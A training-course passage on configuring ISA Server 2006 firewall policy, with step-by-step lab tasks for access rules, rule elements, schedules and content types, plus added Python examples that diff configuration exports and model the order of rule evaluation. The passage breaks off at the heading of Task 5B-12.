There are five basic steps to configuring your ISA Server 2006 Firewall. The ISA Server Getting Started guide provides a simple path through these processes to ensure that you can configure your ISA Server firewall with a minimum of confusion.
The five basic steps to configure an ISA Server 2006 firewall are:
1. Define your ISA Server network configuration.
2. Create Firewall Policy Rules.
3. Define how ISA Server caches web content.
4. Configure VPN access (if required).
5. Set up Monitoring on your ISA Server.
Each of these tasks has a configuration page that guides you step by step through the various wizards and configuration pages associated with the individual tasks. In the following tasks, you will explore the ISA Server Management Console and configure each of these options for your ISA Server 2006 firewall.
Understanding the ISA Server Management Console
You manage your ISA Server 2006 firewall through the ISA Server Management Console. This console has three basic areas that you can use to navigate and configure ISA Server 2006:
• Console Tree (left pane)
• Details pane (center pane)
• Tasks pane (right pane)
Figure 5-17: The ISA Server Management Console panes.
In the following task, you will explore the ISA Server Management Console and familiarize yourself with its functions and behaviors. The tool is very intuitive, but it does have a lot of moving parts, so the more time you spend getting comfortable with it, the more efficient you will become at configuring ISA Server.
TASK 5B-3
Exploring the Microsoft ISA Server 2006 Interface
Setup: You must be logged on to Windows 2003 Server as an administrator and have completed task 3B-2.
1. Choose Start→All Programs→Microsoft ISA Server→ISA Server Management.
2. Notice that the ISA Server Management console is divided into three panes:
  • The left hand pane is your Console Tree pane. This pane contains a short list of navigable containers. The containers in this pane logically group related management or configuration settings.
  • The center pane is your Details pane. For each container in the Console Tree pane, the Details pane will contain information related to the configuration container selected in the Console Tree. Depending on the configuration container selected, the Details pane may have multiple tabs of information.
  • The right pane is your Tasks pane. The Tasks pane contains two tabs: the Tasks tab has a list of relevant tasks that can be performed for the selected container in the Tree pane. If the configuration container selected in the Console Tree pane shows multiple tabs of information in the Details pane, the Tasks tab is contextual, that is, it will contain Tasks that can be performed for any selected tab in the Details pane of a particular configuration container. In addition, the Tasks pane also contains a Help tab with context-sensitive help for the selected Details pane tab.
3. Notice that the Details pane defaults to the Welcome information. In this section, you can find links to guides on Getting Started, Securing your ISA Server, and Internet Websites with ISA Server Information.
4. In the Console Tree pane, expand the container with your server name by clicking the + symbol.
5. In the Console Tree pane, expand the Configuration container by clicking the + symbol.
  You have now exposed the whole configuration container chain for a standalone ISA Server 2006 firewall. The Console Tree can/will contain other items if the ISA Server is part of an ISA Array in a domain.
6. In the Console pane, select the WIN-R01 configuration container.
7. Notice that this places the Getting Started information in the Details pane. This lists out the five configuration steps for ISA Server. Briefly read down the list of items in the Details pane.
8. In the Details pane, click the Define Your ISA Server Network Configuration link.
9. Notice that the selected container in the Console Tree pane changed to the Networks container.
  The three panes found in the ISA Server Management console are linked. Clicking a link in any of the panes will take you to the correct configuration container for the property you are trying to configure.
10. Explore the four tabs in the Details pane of the Networks container.
11. Notice that as you move between tabs in the Details pane, the Tasks pane
changes to show contextually relevant links for each tab.
12. On the middle of the vertical divider between the Details pane and the Task
pane, click the arrow icon. Notice that the Tasks pane collapses to create a
larger viewable area for the Details pane.
13. Click the arrow icon again. The Tasks pane expands again to allow access
to the tasks listed for the Details pane tab.
14. In the Console Tree pane, select the Monitoring container.
15. Notice that this container has seven tabs in the Details pane.
16. In the Details pane, select the Services tab.
17. On the Services tab, select the Microsoft Firewall item.
18. On the Task pane under Services Tasks, click the Stop Selected Service
link.
19. Notice that after the service stops, the Tasks link changes context from Stop
to Start.
20. Restart the service after it stops by clicking the Start Selected Service
link.
21. In the Details pane, after the service restarts, click the Alerts tab.
22. On the Tasks pane, click the Refresh now link.
23. Notice that the action of starting and stopping the service generated an alert
entry.
24. Click the Dashboard tab.
25. Notice that Alerts is one of the items on the Dashboard. The Dashboard
gives you a quick overview of the current state of activity on your ISA
Server.
26. In the Console Tree pane, select the Firewall Policy container.
27. Notice in the Details pane that one rule, the Default Rule of deny all traffic for all networks, exists.
  ISA Server installs only this default Deny All rule during installation. To allow traffic to pass through the ISA Server, you must configure rules to permit it to pass.
28. Notice on the Tasks pane for the Firewall Policy container that there is a
long list of tasks that can be performed.
29. Explore the list of tasks in the Firewall Policy Tasks section of the Task
pane.
30. Notice that these tasks are broken down into four categories:
Firewall Policy Tasks
Policy Editing Tasks
System Policy Tasks
Related Items
Again, the Tasks pane is context sensitive to the container selected in the
Console Tree pane and the tab selected in the Details pane. If you are having
trouble locating a task, be sure you have selected the right container and
Details tab.
31. Notice that the Tasks pane now has a third tab called Toolbox.
32. Select the Toolbox tab in the Tasks pane.
33. Notice that the Toolbox tab has five expandable sections.
  Note: This configuration area of the ISA Server Management console is where you can create and manage all of the various items that can be used in firewall policy rule configurations. A strong familiarity with these items will greatly benefit you when you create custom firewall policy rules for your network. We will return to this area later when we create custom rules.
34. Browse through the Toolbox tab sections. Be sure to expand and explore a few sub-containers under the various sections also.
  Note: Right-clicking any item in a container in the toolbox will give you a context menu listing available actions that can be taken on that object. Be sure to cancel out of any dialog boxes you may open and discard any changes to the configuration. This is important so that your firewall will behave as expected in the remaining ISA task exercises.
35. Explore the remaining Console Tree pane configuration containers and their associated Details and Tasks panes.
36. After you have explored a bit, close the ISA Server 2006 Management console window.
Exporting/Importing ISA Server 2006 Configurations as XML Files
One of the features that makes ISA Server 2006 easy to manage is the ability of ISA Server to export the current configuration as an XML file. It is now simpler than ever to back up and restore your firewall configuration. To return to that configuration, you simply import the XML configuration file back into ISA Server. Exporting your working configuration before making any adjustments to the firewall configuration is always a good idea, especially when the firewall policy is complex with many layers of rules applied. This will ensure that you can return to the last known good configuration with a minimum of hassle or down time.
TASK 5B-4
Exporting the Default Configuration
Setup: You must be logged on to Windows 2003 Server as an administrator and have completed task 3B-2.
1. Choose Start→All Programs→Microsoft ISA Server→ISA Server Management.
2. In the Console Tree pane, select the container with your ISA server name.
3. On the Tasks tab, click the Export (Backup) this ISA Server Configuration link.
4. In the Export Wizard dialog box, click Next.
5. In the Export Preferences dialog box, select Export User Permissions. We have no confidential information, such as user passwords and certificates, to export, so we will leave that check box unchecked.
6. Click Next.
7. In the Save The Data To This File field, enter C:\originalcfg.xml and click Next.
8. Click Finish.
9. After the file finishes exporting, click OK.
10. Close the ISA Server 2006 Management Console.
We now have the ability to return to our default configuration if we accidentally misconfigure our firewall. Adding the exported ISA Server configuration XML files to your regular backups would be a good configuration management tool and policy.
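One way to turn the exported XML into a configuration-management check, as an added Python example that is not from the course or from ISA Server itself: it fingerprints an export for the backup record, compares a "last known good" export with a later one, reports rules that were added, removed, or changed, and flags any Allow rule with no protocol restriction (a "permit all" exception to the deny-all, permit-by-exception approach). The two embedded documents and their element and attribute names are constructed for illustration and are not ISA Server's export schema; to run this against real exports you would adapt parse_rules to the actual element names.

```python
import hashlib
import xml.etree.ElementTree as ET

# Constructed stand-ins for two exports. The element and attribute names are an
# assumption for illustration only; they are NOT ISA Server's export schema.
BASELINE_XML = """<?xml version="1.0"?>
<FirewallConfig>
  <PolicyRules>
    <Rule Name="Allow web" Action="Allow" Order="1">
      <Protocols><Protocol>HTTP</Protocol></Protocols>
    </Rule>
    <Rule Name="Default rule" Action="Deny" Order="999"/>
  </PolicyRules>
</FirewallConfig>"""

CURRENT_XML = """<?xml version="1.0"?>
<FirewallConfig>
  <PolicyRules>
    <Rule Name="Allow web" Action="Allow" Order="1">
      <Protocols><Protocol>HTTP</Protocol><Protocol>HTTPS</Protocol></Protocols>
    </Rule>
    <Rule Name="Allow everything" Action="Allow" Order="2"/>
    <Rule Name="Default rule" Action="Deny" Order="999"/>
  </PolicyRules>
</FirewallConfig>"""


def fingerprint(xml_text: str) -> str:
    """SHA-256 of the export, recorded alongside the backup so a restored
    file can be checked against what was actually saved."""
    return hashlib.sha256(xml_text.encode("utf-8")).hexdigest()


def parse_rules(xml_text: str) -> dict:
    """Reduce an export to {rule name: {action, order, protocols}}."""
    root = ET.fromstring(xml_text)
    rules = {}
    for rule in root.iter("Rule"):
        protocols = sorted(p.text for p in rule.iter("Protocol"))
        rules[rule.get("Name")] = {
            "action": rule.get("Action"),
            "order": int(rule.get("Order")),
            "protocols": protocols,
        }
    return rules


def diff_rules(baseline: dict, current: dict) -> dict:
    """Rules present only in one export, and rules whose definition changed."""
    common = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(n for n in common if baseline[n] != current[n]),
    }


def find_permit_all(rules: dict) -> list:
    """Allow rules with no protocol restriction break deny-all, permit-by-exception."""
    return sorted(n for n, r in rules.items() if r["action"] == "Allow" and not r["protocols"])


def review_change(baseline_xml: str, current_xml: str) -> dict:
    """Compare the last known good export with the current one."""
    if fingerprint(baseline_xml) == fingerprint(current_xml):
        return {"unchanged": True}
    report = diff_rules(parse_rules(baseline_xml), parse_rules(current_xml))
    report["permit_all"] = find_permit_all(parse_rules(current_xml))
    return report


if __name__ == "__main__":
    print("baseline sha256:", fingerprint(BASELINE_XML))
    print(review_change(BASELINE_XML, CURRENT_XML))
```

Run before importing a saved configuration or after any rule change: an empty report confirms the export matches the baseline, and a non-empty permit_all list is the kind of exception you would expect to see documented and approved before it reaches the firewall.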
ISA Server 2006 Firewall Policies
ISA Server 2006 manages network access through the firewall using layered firewall policies. These firewall policies can contain a set of access rules, publishing rules, and network rules. Each type of rule in a policy controls a different form of access across the firewall. The rules contained within an ISA Server firewall policy determine how and what network traffic can access resources through the firewall.
Access Rules
In ISA Server 2006 (like most other firewalls), the access rules are built from the following building blocks:
• Rule Name
• Rule Action (Allow, Deny)
• Protocol and Port
• Traffic Source
• Traffic Destination
• User Sets
• Content Groups
The parameters specified during the rule's construction will create the constraint set that the rule set will enforce through the firewall policy of the ISA Server that the rule was created on. A best practice is to evaluate, define, and document each rule before you implement it in ISA Server. This will ensure you get the expected results by applying the rule. Some firewall administrators find it helpful to diagram the rule and include the diagram with the rule documentation.
ISA Server has three basic types of rules:
• Access rules: In ISA Server, an access rule controls what network traffic from the internal network is allowed to access the external network. Access rules can apply to all traffic, to only a selected set of protocols, or to all traffic except a selected set of protocols. The same thing applies to source, destination, or user sets. A rule can apply to all, only a selected subset, or all but a selected subset.
• Publishing rules: ISA Server defines publishing rules as rules that control access requests from the external network for internal resources. This type of rule is applied to a web server that you want to provide public access to or to an SMTP server that needs to accept inbound mail delivery. In actuality, these are simply access rules applied to inbound traffic as opposed to outbound traffic. They can apply to the full set of rule building blocks or a selected subset just like access rules.
• Network rules: ISA Server network rules are built by defining the traffic source, traffic destination, and the network relationship (how the traffic is handled, for example, NAT or Routed). Network rules can be combined with access or publishing rules to provide granular control over the traffic that traverses the ISA Server firewall.
Processing Firewall Policies
ISA Server deals with access requests in two directions: outgoing requests and
incoming requests. As ISA Server receives a request, it processes the information
contained in the packet and compares it against the firewall policy that
contains the configured rule set.
Outgoing Requests
The process of access control for outgoing requests looks like this:
ISA Server first checks any defined network rules and verifies that the two
networks are connected. If a common connection between the source and
destination network exists, ISA Server will then process the access policy
rule set. If no connection is defined in the network rules, the packet is
dropped.
ISA Server now parses the access rules in the order that they are configured.
If an allow rule applies to the request, ISA Server will allow the request.
The first rule that matches the traffic being inspected is the rule that
will apply. This is why ordering is important. ISA Server checks the rule
elements that make up an access rule in this order:
Protocol
Source address and port
Schedule
Destination address
User set
Content groups
Incoming Requests
ISA Server calls rules that control incoming requests publishing rules. These rules
are designed to let you securely provide access to servers by clients on a
different network. Incoming requests are controlled by the ISA Server publishing
policy. The publishing policy is built from web publishing rules, server publishing
rules, secure web publishing rules, and mail server publishing rules. These rules,
in addition to any web chaining rules, control how incoming requests to
published servers are handled.
ISA Server has several types of publishing rules that you can use to control how
resources are accessed. These are:
Web publishing rules: Used to publish web server content.
Secure web publishing rules: Used to publish Secure Sockets Layer (SSL)
content.
Mail server publishing rules: Used to publish mail servers across ISA
Server.
Server publishing rules: Used to publish all other internal resource content.
Remember that access rules that deny traffic are processed before publishing rules
that permit traffic. Your access rules must not explicitly deny any traffic that you
intend to publish.
Note: Access rules that deny traffic are processed before publishing rules that
allow traffic. If a request matches a deny access rule, the request will be
denied, because ISA Server will never get to the publishing rule that would
have permitted the request.
Lesson 5: Configuring Firewalls 225
TASK 5B-5
Creating a Basic Access Rule
Setup: You must be logged on to Windows 2003 Server as an administrator
and have completed the previous tasks. In this task, you will work with
a partner in the classroom to test your configuration of an access rule.
You will need to ask your partner for his or her IP address before you
begin the task.
1. Choose Start→All Programs→Microsoft ISA Server→ISA Server
Management.
2. In the Console Tree pane, expand the container named after your server.
3. Select the Firewall Policy container.
4. Notice in the Details pane that the only rule that exists is the default deny
rule.
5. Open a command prompt.
6. Type ipconfig and then press Enter.
7. Ping your default gateway.
What was your result?
Outbound Ping allowed from your ISA Server.
8. Ping your partner's external IP address.
What was your result?
Your partner's ISA Server blocked the inbound Ping request on his or her
external interface.
9. Minimize the command prompt.
10. In the Tasks pane, under Firewall Policy Tasks, click the Create Access
Rule link.
11. On the New Access Rule Wizard dialog box, in the Access Rule Name
field, enter Inbound Ping to External Interface and then click Next.
12. In the Rule Action dialog box, select the Allow option and then click Next.
13. In the Protocols dialog box, click the Add button.
14. In the Add Protocols dialog box, expand Common Protocols and select
PING, click Add, and then click Close.
15. In the Protocols dialog box, click Next.
16. In the Access Rule Sources dialog box, click the Add button.
17. In the Network Entities dialog box, expand Networks, select External, and
click Add. Then, click Close.
18. In the Access Rule Sources dialog box, click Next.
19. In the Access Rule Destination dialog box, click the Add button.
20. In the Network Entities dialog box, expand Network Sets, select All Pro-
tected Networks, and click Add. Then, click Close.
21. In the Access Rule Destination dialog box, click Next.
22. In the User Sets dialog box, accept the default of All Users and click
Next.
23. Click Finish.
24. At the top of the Firewall Policy Details pane, click Apply.
25. In the Saving Configuration Changes dialog box, click OK.
26. Wait at this step until both partners have completed the previous steps.
27. Restore the command prompt.
28. Ping your partner's external IP address.
What was your result?
Ping was allowed to the external interface of your partner.
29. Minimize the command prompt.
30. In the Details pane, select the Inbound Ping To External Interface rule.
31. In the Tasks pane, click the Disable Selected Rules link.
32. At the top of the Firewall Policy Details pane, click Apply.
33. In the Saving Configuration Changes dialog box, read the note below the
progress bar and then click OK.
34. Wait at this step until both partners have completed the previous step.
35. Restore the command prompt.
36. Ping your partner's external IP address.
What was your result?
Ping was allowed to the external interface of your partner even though the
rule was disabled. This is because you already had an existing connection to
your partner from the initial successful ping test.
Note: If you are not able to ping your partner's IP address, enable the rule
again, ping your partner, and then disable the rule.
37. Choose Start→Control Panel→Network Connections→External.
38. In the External Status dialog box, click the Disable button. This will break
your existing connection to your partner.
39. Wait at this step until both partners have completed the previous step of
disabling the External NIC.
40. Choose Start→Control Panel→Network Connections→External. This
will enable your external connection.
41. Wait at this step until both partners have completed the previous step.
42. Restore the command prompt.
43. Ping your partner's external IP address.
What was your result?
Ping is now blocked again by the ISA Server firewall policy.
44. In the Details pane, select the Inbound Ping To External Interface rule.
45. In the Tasks pane, click the Delete Selected Rules link.
46. In the Confirm Delete dialog box, click Yes.
47. At the top of the Firewall Policy Details pane, click Apply.
48. In the Saving Configuration Changes dialog box, click OK.
49. Close all open windows.
It is important to remember that any rules you add to the firewall policy will not
take effect on any connections that are already established. This is because ISA
Server 2006 is a stateful firewall and those connections are currently listed in the
state tables. Stateful firewalls consult the state tables before parsing the firewall
rules. If the connection is listed in the state table, it will not be checked against
the rule set again until it is removed from the state table, either through a timeout
or by the source terminating the connection. You can force the state table to reset
for all connections by disabling and enabling the network interface that the
connection is associated with.
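The evaluation order laid out under Processing Firewall Policies, the state-table behaviour just seen in Task 5B-5, and the scheduled content rule built later in Task 5B-10, as an added Python model that is not ISA Server code. Network, rule and content-type names follow this lesson; the request data, the dates and the coarse connection key are constructed for illustration.

```python
from dataclasses import dataclass, field
from datetime import datetime

ANY = frozenset({"*"})   # element covering everything (All Networks, All Users, ...)

@dataclass
class Request:
    protocol: str                      # ISA protocol definition name, e.g. "PING"
    src_net: str                       # network the packet arrives from
    dst_net: str                       # network it is going to
    user: str = "anonymous"
    content: str = "none"              # content type of the payload (HTTP only)
    when: datetime = datetime(2007, 1, 8, 10)   # a Monday at 10:00 (constructed)

@dataclass
class AccessRule:
    name: str
    action: str                        # "Allow" or "Deny"
    protocols: frozenset = ANY
    sources: frozenset = ANY
    schedule: frozenset = None         # None = Always; else active (weekday, hour) slots
    destinations: frozenset = ANY
    users: frozenset = ANY
    content: frozenset = ANY

    def matches(self, r: Request) -> bool:
        """Compare elements in ISA's documented order; `and` stops at the first mismatch."""
        def hit(element, value):
            return "*" in element or value in element
        return (hit(self.protocols, r.protocol)
                and hit(self.sources, r.src_net)
                and (self.schedule is None
                     or (r.when.weekday(), r.when.hour) in self.schedule)
                and hit(self.destinations, r.dst_net)
                and hit(self.users, r.user)
                and hit(self.content, r.content))

def grid(days, start_hour, end_hour):
    """Active (weekday, hour) blocks of the 7x24 schedule grid; Monday = 0."""
    return frozenset((d, h) for d in days for h in range(start_hour, end_hour))

# "Work hours" as modified in Task 5B-9: Mon-Fri 8 A.M. to 9 P.M. minus the lunch hour.
WORK_HOURS = grid(range(5), 8, 21) - grid(range(5), 12, 13)

@dataclass
class Policy:
    network_rules: set                 # (src_net, dst_net) pairs joined by a network rule
    access_rules: list                 # in configured order
    state_table: set = field(default_factory=set)

    def evaluate(self, r: Request):
        """Return (action, reason) for one request."""
        key = (r.protocol, r.src_net, r.dst_net)
        if key in self.state_table:    # established connections skip the rule set
            return "Allow", "state table"
        if (r.src_net, r.dst_net) not in self.network_rules:
            return "Deny", "no network rule"   # networks not connected: dropped
        for rule in self.access_rules:         # first matching rule wins
            if rule.matches(r):
                if rule.action == "Allow":
                    self.state_table.add(key)
                return rule.action, rule.name
        return "Deny", "Default rule"          # ISA's built-in deny-all rule

    def reset_interface(self):
        """Disabling and re-enabling the NIC drops every tracked connection."""
        self.state_table.clear()

def task_5b5_walkthrough():
    """Replays the four ping results of Task 5B-5, in order."""
    pol = Policy(network_rules={("External", "Local Host")}, access_rules=[])
    ping = Request("PING", "External", "Local Host")
    results = [pol.evaluate(ping)[0]]          # only the default rule: blocked
    rule = AccessRule("Inbound Ping to External Interface", "Allow",
                      protocols=frozenset({"PING"}), sources=frozenset({"External"}),
                      destinations=frozenset({"Local Host", "Internal"}))
    pol.access_rules.append(rule)
    results.append(pol.evaluate(ping)[0])      # allowed; now in the state table
    pol.access_rules.remove(rule)              # rule disabled
    results.append(pol.evaluate(ping)[0])      # still allowed via the state table
    pol.reset_interface()                      # external NIC disabled and enabled
    results.append(pol.evaluate(ping)[0])      # blocked again
    return results

def video_rule_outcome(hour, content, video_rule_first=True):
    """Name of the rule that decides an HTTP request from Internal on a Monday at `hour`.
    Models Task 5B-10's Deny rule (Video content, Work hours schedule) placed before,
    or to show why order matters after, a general web-allow rule."""
    deny_video = AccessRule("Enforce Video Content Policy", "Deny",
                            sources=frozenset({"Internal"}), schedule=WORK_HOURS,
                            content=frozenset({"Video"}))
    allow_web = AccessRule("Allow Web", "Allow", protocols=frozenset({"HTTP"}),
                           sources=frozenset({"Internal"}))
    rules = [deny_video, allow_web] if video_rule_first else [allow_web, deny_video]
    pol = Policy(network_rules={("Internal", "External")}, access_rules=rules)
    req = Request("HTTP", "Internal", "External", content=content,
                  when=datetime(2007, 1, 8, hour))
    return pol.evaluate(req)[1]
```

Calling `video_rule_outcome(10, "Video", video_rule_first=False)` shows the ordering pitfall: with the allow rule first, the video deny rule is never reached.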
ISA Server 2006 Access Rule Elements
There are eight basic access rule elements that are used to build ISA Server 2006
access rules when creating a firewall policy. These elements describe specific
characteristics of a network traffic packet that ISA Server can inspect and use for
rule comparison. The elements that ISA Server 2006 uses to create a protocol rule
are:
Name: This is used by ISA Server to display the rules contained in the
firewall policy container in the management console. Using descriptive, easy
to understand names will help you keep track of what each rule is intended
to do.
Action: This is the action ISA Server will take when the rule is triggered by
a match. The two possible actions are Allow or Deny. Action elements can
also be configured to log requests that match a rule or to redirect HTTP
requests that match a rule to a web page.
Protocols: This element describes the protocol and port that the rule will
match.
Network: These elements describe the device addresses or network nodes
that the rule will apply to. They are used in building the following two rule
elements:
Source: This element describes where the packet is coming from.
Destination: This element describes where the packet is going to.
Users: This element describes the user or groups of users that the rule will
apply to.
Schedule: This element describes the days and times that the rule will be
enforced.
Content Types: This element describes the network data packet contents that
the rule will be applied to.
ISA Server 2006 has a robust set of access rule elements pre-configured when it
is installed. However, you can easily create additional rule elements that meet
your specific requirements when the default rule elements will not address the
rule you are trying to create. Since it is impossible to predict what type of traffic
any given network may require, the ability to create additional rule elements
gives ISA Server 2006 the flexibility to adapt to any requirements.
TASK 5B-6
Creating a Protocol Rule Element
Setup: You must be logged on to Windows 2003 Server as an administrator
and have completed the previous tasks. In this exercise, you will create a
custom protocol element that you could use to control network traffic for a
custom network application that uses TCP port 2120 inbound across your
firewall, with return client connections dynamically established across the
range 49152-65535.
1. Choose Start→All Programs→Microsoft ISA Server→ISA Server
Management.
2. Expand the Console Tree pane and select the Firewall Policy container.
3. In the Tasks pane, select the Toolbox tab.
4. On the Toolbox tab, expand the Protocols container.
5. Explore the various protocol elements that are defined by default.
6. On the Toolbox tab, under the Protocols container, click the New drop-
down menu, and select Protocols.
7. In the New Protocol Definition Wizard dialog box, in the Protocol Definition
Name field, type Custom Application Protocol and then click Next.
8. In the Primary Connection Information dialog box, click the New button.
9. In the New/Edit Protocol Connection dialog box, enter the following values
and then click OK.
Protocol type: TCP
Direction: Inbound
Port Range:
From: 2120
To: 2120
10. In the Primary Connection Information dialog box, click Next.
11. In the Secondary Connections dialog box, under Do You Want To Use Sec-
ondary Connections? select the Yes radio button, and then click New.
12. In the New/Edit Protocol Connection dialog box, enter the following values
and then click OK.
Protocol type: TCP
Direction: Outbound
Port Range:
From: 49152
To: 65535
13. In the Secondary Connection Information dialog box, click Next.
14. In the New Protocol Definition Wizard, click Finish.
15. Notice that your new User-Defined protocol now shows in the Toolbox
Protocols area.
16. At the top of the Details pane, click the Apply button.
17. In the Saving Configuration Changes dialog box, click OK.
18. Close the ISA Server 2006 Management console.
TASK 5B-7
Creating a User Rule Element
Setup: You must be logged on to Windows 2003 Server as an administrator
and have completed the previous tasks. In this exercise, you will create a
user element just for the administrator account. As an example, this user
element could then be used in an access rule to deny the administrator
account access to any resources on the external network.
1. Choose Start→All Programs→Microsoft ISA Server→ISA Server
Management.
2. Expand the Console Tree pane and select the Firewall Policy container.
3. In the Task pane, select the Toolbox tab and then expand the Users
container.
4. Notice that ISA Server has three default user elements pre-defined.
5. At the top of the Users container, click the New link.
6. In the New User Set Wizard, in the User Set Name field, type Administrator
Account and then click Next.
7. In the Users dialog box, click the Add button, and from the pop-up
menu, choose Windows Users And Groups.
8. In the Select User Or Groups dialog box, click the Advanced button.
9. In the Select User Or Groups dialog box, click the Find Now button.
10. In the Search results list, select the Administrator account and then click
OK. Note: be sure you do not select the Administrators group.
11. In the Select User Or Groups dialog box, verify that the Administrator
account appears and then click OK.
12. In the Users dialog box, click Next.
13. In the New User Set dialog box, click Finish.
14. Notice that your new user set appears in the Toolbox pane.
15. At the top of the Details pane, click the Apply button.
16. In the Saving Configuration Changes dialog box, click OK.
17. Close the ISA Server 2006 Management console.
Content Types
ISA Server 2006 comes preconfigured with a variety of content types by default.
If your targeted content type is not already defined, it is an easy task to configure
a custom content type to suit your organization's needs.
ISA Server 2006's deep packet inspection allows ISA Server to control traffic
based not only on source, destination, protocol, and port, but also on content
type. This is useful in enforcing an organization's security policy when it
forbids certain types of content for security or other reasons. For example, suppose
your organization's security policy forbids the downloading of executable .exe files
from the Internet. You could create a content type for .exe files and then assign
the new content type to a deny access rule to block any content that contains a
.exe file.
TASK 5B-8
Creating a Content Group Rule Element
Setup: You must be logged on to Windows 2003 Server as an administrator
and have completed the previous tasks.
1. Choose Start→All Programs→Microsoft ISA Server→ISA Server
Management.
2. Expand the Console Tree pane and select the Firewall Policy container.
3. In the Task pane, select the Toolbox tab.
4. In the Toolbox tab of the Task pane, expand the Content Types section.
5. Examine the pre-defined content types. Notice that .exe files are not
defined.
6. Under the Content Types heading, click the New link.
7. In the New Content Type Set dialog box, in the Name field, type Exe Files.
8. In the New Content Type Set dialog box, from the Available Types drop-
down list, select the .exe type and then click Add.
9. In the New Content Type Set dialog box, click OK. The new Exe Files
content type appears in the Content Types list.
10. At the top of the Details pane, click Apply.
11. In the Saving Configuration Changes dialog box, click OK.
ISA Server 2006 Scheduling
ISA Server 2003 has the ability to create and use schedules to control when cer-
tain access rules are in effect. Schedules can be used in conjunction with other
access rule components when creating an access rule to specify the times and/or
days that the rule is enforced.
TASK 5B-9
Creating and Modifying Schedule Rule Elements
Setup: You must be logged on to Windows 2003 Server as an administrator
and have completed the previous tasks.
1. In ISA Server Management, expand the Console Tree pane and select the
Firewall Policy container.
2. In the Task pane, select the Toolbox tab.
3. In the Toolbox tab of the Task pane, expand the Schedules section.
4. Notice that there are two pre-defined schedules: Weekends and Work Hours.
5. Select the Work hours schedule and then click the Edit link.
6. In the Work hours Properties dialog box, click the Schedule tab.
7. Notice that the schedule contains a grid comprised of 7 week days and 24
hours in one-hour increments.
8. Notice that each one-hour block of time can be set to either Active or
Inactive on the schedule.
9. Click and drag your cursor from Monday 8:00 A.M. to Friday 8:00 P.M.
and then click the Active radio button to extend the work hours to start at
8:00 A.M. instead of 9:00 A.M. and to extend to 9 P.M. Monday through
Friday.
10. Click and drag your cursor from Monday 12:00 P.M. to Friday 12:00
P.M. and then click the Inactive radio button to remove the lunch hour
from the Work hours schedule.
11. Click OK to close the Work Hours Properties dialog box.
12. On the Toolbox tab, under the Schedules area, click the New link.
13. In the New Schedule dialog box, in the Name field, type After hours.
14. Click and drag your mouse pointer in the schedule field from Monday
at 8:00 A.M. to Friday at 8:00 P.M. to cover the workday hours and then
click the Inactive radio button.
15. In the New Schedule dialog box, click OK.
16. At the top of the Details pane, click Apply.
17. In the Saving Configuration Changes dialog box, click OK.
You have now modified the existing Work hours schedule and created a new
schedule for After hours. These schedules can be used in rule creation to control
what times a rule is enforced by ISA Server 2006. This adds a great deal of
flexibility to your ability to configure and enforce firewall policies.
Using Content Types and Schedules in Rules
You have discovered that ISA Server has Content Types and Schedules that can
be used in rule creation. As a practical example, these objects could be used to
enforce an organization's acceptable use policy that prohibits viewing video
content during normal work hours but allows video content during lunch and
after hours. Using the schedule feature in ISA Server 2006 allows you to create a
schedule that can be incorporated into a rule governing video content to enforce
the organization's acceptable use policy.
TASK 5B-10
Using Content Types and Schedules in Rules
Setup: You must be logged on to Windows 2003 Server as an administrator
and have completed the previous tasks.
1. In ISA Server Management, expand the Console Tree pane and select the
Firewall Policy container.
2. In the Task pane, select the Tasks tab.
3. In the Tasks pane, under Firewall Policy Tasks, click the Create Access
Rule link.
4. In the New Access Rule Wizard dialog box, in the Access Rule Name
field, type Enforce Video Content Policy and click Next.
5. In the Rule Action dialog box, select the Deny radio button and then click
Next.
6. In the Protocols dialog box, from the This Rule Applies To drop-down list,
select All Outbound Traffic and then click Next.
7. In the Access Rule Sources dialog box, click the Add button.
8. In the Network Entities dialog box, expand Network Sets, select All Pro-
tected Networks, click Add, and then click Close.
9. In the Access Rule Sources dialog box, click Next.
10. In the Access Rule Destination dialog box, click the Add button.
11. In the Network Entities dialog box, expand Network Sets, select All Net-
works (and Local Host), and click Add. Then, click Close.
12. In the Access Rule Destination dialog box, click Next.
13. In the User Sets dialog box, accept the default of All Users and click
Next.
14. Click Finish.
15. On the Tasks tab, under Policy Editing Tasks, click the Edit Selected Rule
link.
16. Notice that the rule property dialog box has tabs for each of the items we
configured during rule creation (General, Action, Protocols, From, To, and
Users) and it also contains two additional tabs: Schedule and Content Types.
17. Click the Schedule tab, and from the Schedule drop-down list, select Work
hours.
18. Click the Content Types tab and select the Selected content type radio
button.
19. Scroll down in the Content Types list, select the Video content type,
and then click OK.
20. At the top of the Firewall Policy Details pane, click Apply.
21. In the Saving Configuration Changes dialog box, click OK.
22. The ISA Server firewall will now enforce our video policy during work
hours.
ISA Server 2006 Network Rule Elements
You have discovered that ISA Server 2006 uses a set of elements as the building
blocks for access rules. Networks are rule elements, which are made up of one or
more ranges of network IP addresses or other network identifier characteristics.
ISA Server 2006 network elements include one or more computers, typically
corresponding to a physical network. You can apply rules to one or more networks
or to all addresses except those in the specified network. ISA Server 2006 creates
network elements for the following objects:
Networks
Network Sets
Computers
Address Ranges
Subnets
Computer Sets
URL Sets
Domain Name Sets
Web Listeners
Server Farms
ISA Server 2006 has a set of default network elements that are pre-defined. You
can use these default elements as part of an access rule definition or you can
create custom network elements to meet your specific needs.
TASK 5B-11
Creating a Network Rule Element
Setup: You must be logged on to Windows 2003 Server as an administrator
and have completed the previous task.
1. In ISA Server Management, expand the Console Tree pane and select the
Firewall Policy container.
2. In the Task pane, select the Toolbox tab.
3. In the Toolbox tab of the Task pane, expand the Network Objects
container.
4. Examine the pre-defined Network Objects.
5. On the Toolbox tab, at the top of the Network Objects container, click the
New drop-down menu, and choose Computer from the pop-up menu.
6. In the New Computer Rule Element dialog box, enter the following values
and then click OK:
Name: [Your computer name]
Computer IP Address: [Your computer IP address]
Description: ISA Firewall
7. At the top of the Firewall Policy Details pane, click Apply.
8. In the Saving Configuration Changes dialog box, click OK.
We could now use this new Network Object as an element in an access rule that
would only apply to the ISA Server 2006 firewall at our IP address.
ISA Server Publishing Rules
Up to this point, we have primarily been concerned with access rules and their
constituent elements. Access rules in ISA Server 2006 are designed to control
traffic that traverses the firewall from the unprotected network (external) to the
protected network (internal). But how does ISA Server 2006 make protected
resources, such as a web server, available to external access? For this purpose,
ISA Server has publishing rules. Publishing rules apply to traffic requests for
resources on the internal protected network.
Publishing rules are made up of elements similar to those of an access rule, with one
notable exception: publishing rules require a Listener element to be created. The
listener element describes what interface ISA Server should be listening on for
access requests to the internal resource defined in the publishing rule.
Figure 5-18: Features and benefits of ISA Server content publishing.
TASK 5B-12
